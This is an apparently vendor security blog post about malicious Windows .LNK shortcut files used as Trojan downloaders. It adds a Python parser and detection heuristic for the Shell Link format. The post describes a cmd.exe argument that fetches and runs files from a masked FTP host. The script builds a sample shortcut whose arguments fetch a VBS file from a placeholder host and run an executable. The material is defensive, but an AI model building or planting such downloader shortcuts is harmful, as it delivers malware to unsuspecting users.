Windows Shortcut .LNK - Another Misused File Format
Published: May 27 2009, 10:44 PM by Methusela Cebrian Ferrer
Amidst the bulk of malicious executables we deal with every day, there is an interesting attack vector that uses Windows Shortcuts, referred to as LNK files because of their .LNK file extension.
These are small files that contain information such as the name and path of the target program they represent. A LNK file can also store the target's file attributes, its local or network location, and the command-line arguments it is launched with.

A good example of a very common shortcut file you will find on the desktop is the Internet Explorer shortcut. However, telling a clean shortcut from a malicious one by looking at it is not easy, so you could end up executing the file before realizing that it is suspicious.
In recent cases, malicious LNK files were crafted as Trojan downloaders, sometimes disguised as a legitimate file, program or folder to persuade the target victim to execute them.
Figure 03 shows what you would see if you dragged a malicious LNK file to a text editor such as Notepad:

In this example, you will find a short argument passed to cmd.exe, which connects to a malicious FTP server (ftp://g***.vicp.net) to download and execute ntdet.exe in C:\ and pub.vbs in the Windows directory. This is just one example; it demonstrates how an attacker can craft a malicious LNK file, changing its icon and downloader behaviour to suit their intent.
Furthermore, Windows users may receive this threat by email, through a browser exploit, or bundled with other malicious files.
Take extra precautions with this kind of trick by following our recommendations below:
- Think twice before clicking on a shortcut file. If in doubt, simply drag the file to Notepad and check for any suspicious strings.
- Include the .LNK extension in your list of unwanted email attachments; this is a must for enterprise email blocking and filtering administration.
- Stay up to date with software patches to close exploit attack vectors.
- Make sure your security software is running and uses the latest signature update.
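The two points above that matter for a defender are the format itself (a shortcut stores a target path, a working directory and command-line arguments) and the advice to look for suspicious strings before clicking. The following Python script is an added example written for this post, not code from the post or its author: it parses the Shell Link binary layout as documented in Microsoft's public MS-SHLLINK specification, pulls out those fields, and applies a simple defensive heuristic for the downloader pattern described, namely a shortcut whose real target is a command interpreter and whose arguments fetch or run something, possibly hiding behind a borrowed system icon. The two sample shortcuts are constructed in memory; the hostname and icon path in them are placeholders, not real indicators.

```python
"""Minimal .LNK (Shell Link) field extractor with a downloader heuristic.
Added example for this post, not the author's code. Layout follows the
public MS-SHLLINK specification; the samples below are constructed here."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-000000000046}
HEADER_SIZE = 0x4C

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

# StringData items always appear in this order, each present only if its flag is set.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

INTERPRETERS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
FETCH_MARKERS = re.compile(r"ftp://|https?://|\bftp\b|\.vbs\b|\.exe\b", re.I)


def _string_data(buf, off, is_unicode):
    """One StringData item: CountCharacters (uint16) then that many characters, no NUL."""
    count, = struct.unpack_from("<H", buf, off)
    off += 2
    if is_unicode:
        return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return buf[off:off + count].decode("cp1252", "replace"), off + count


def parse_lnk(buf):
    """Parse a .LNK byte string into a dict of its human-readable fields."""
    if len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags, = struct.unpack_from("<I", buf, 20)
    icon_index, = struct.unpack_from("<i", buf, 56)
    info = {"icon_index": icon_index, "local_base_path": None}
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip the shell item ID list
        id_list_size, = struct.unpack_from("<H", buf, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                      # LinkInfo carries the resolved local path
        start = off
        link_info_size, _hdr_size, info_flags = struct.unpack_from("<III", buf, off)
        if info_flags & 0x01:                      # VolumeIDAndLocalBasePath
            lbp_off, = struct.unpack_from("<I", buf, start + 16)
            end = buf.index(b"\x00", start + lbp_off)
            info["local_base_path"] = buf[start + lbp_off:end].decode("cp1252", "replace")
        off = start + link_info_size
    for key, bit in STRING_FIELDS:
        info[key], off = _string_data(buf, off, flags & IS_UNICODE) if flags & bit else (None, off)
    return info


def suspicious_reasons(info):
    """Defensive heuristic: interpreter target with fetch/run arguments or a borrowed icon."""
    reasons = []
    target = (info["local_base_path"] or info["relative_path"] or "").lower()
    if not target.endswith(INTERPRETERS):
        return reasons
    hits = sorted({m.group(0).lower() for m in FETCH_MARKERS.finditer(info["arguments"] or "")})
    if hits:
        reasons.append("%s launched with arguments mentioning %s"
                       % (target.rsplit("\\", 1)[-1], ", ".join(hits)))
    if (info["icon_location"] or "").lower().endswith(("shell32.dll", "explorer.exe")):
        reasons.append("interpreter shortcut borrows a system icon (%s, index %d)"
                       % (info["icon_location"], info["icon_index"]))
    return reasons


def build_lnk(local_base_path, arguments=None, icon_location=None, icon_index=0):
    """Construct a minimal, well-formed .LNK in memory (constructed sample, not a real file)."""
    flags = HAS_LINK_INFO | HAS_WORKING_DIR | IS_UNICODE
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, icon_index, 1, 0, 0, 0, 0)
    # LinkInfo: 28-byte header, VolumeID with empty label, LocalBasePath, empty CommonPathSuffix
    volume_id = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"        # DriveType 3 = DRIVE_FIXED
    base = local_base_path.encode("cp1252") + b"\x00"
    lbp_off = 28 + len(volume_id)
    link_info = struct.pack("<IIIIIII", lbp_off + len(base) + 1, 28, 0x01, 28, lbp_off, 0,
                            lbp_off + len(base)) + volume_id + base + b"\x00"

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    tail = s(local_base_path.rsplit("\\", 1)[0])                     # working directory
    tail += s(arguments) if arguments else b""
    tail += s(icon_location) if icon_location else b""
    return header + link_info + tail + b"\x00\x00\x00\x00"           # TerminalBlock


# Constructed samples: a shortcut shaped like the downloader the post describes, and a plain IE one.
DOWNLOADER_LNK = build_lnk(
    r"C:\Windows\System32\cmd.exe",
    arguments=r'/c start "" ftp://ftp.example.invalid/pub.vbs & C:\ntdet.exe',  # placeholder host
    icon_location=r"%SystemRoot%\system32\SHELL32.dll", icon_index=3)           # folder icon
BENIGN_LNK = build_lnk(r"C:\Program Files\Internet Explorer\iexplore.exe")


def scan(buf):
    """Return (fields, reasons) for one shortcut; reasons is empty when nothing looks off."""
    info = parse_lnk(buf)
    return info, suspicious_reasons(info)


if __name__ == "__main__":
    for name, blob in (("downloader", DOWNLOADER_LNK), ("benign", BENIGN_LNK)):
        fields, why = scan(blob)
        print(name, "->", fields["local_base_path"], fields["arguments"], why or "looks clean")
```

The parser reads the same fields Notepad shows you as stray strings, but in a form a mail gateway or endpoint scanner can act on; the heuristic is deliberately narrow (interpreter target plus download-looking arguments or a disguised icon) so that ordinary shortcuts to cmd.exe or to a browser are not flagged. On a real file, pass `open(path, "rb").read()` to `scan`.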
Stay Safe!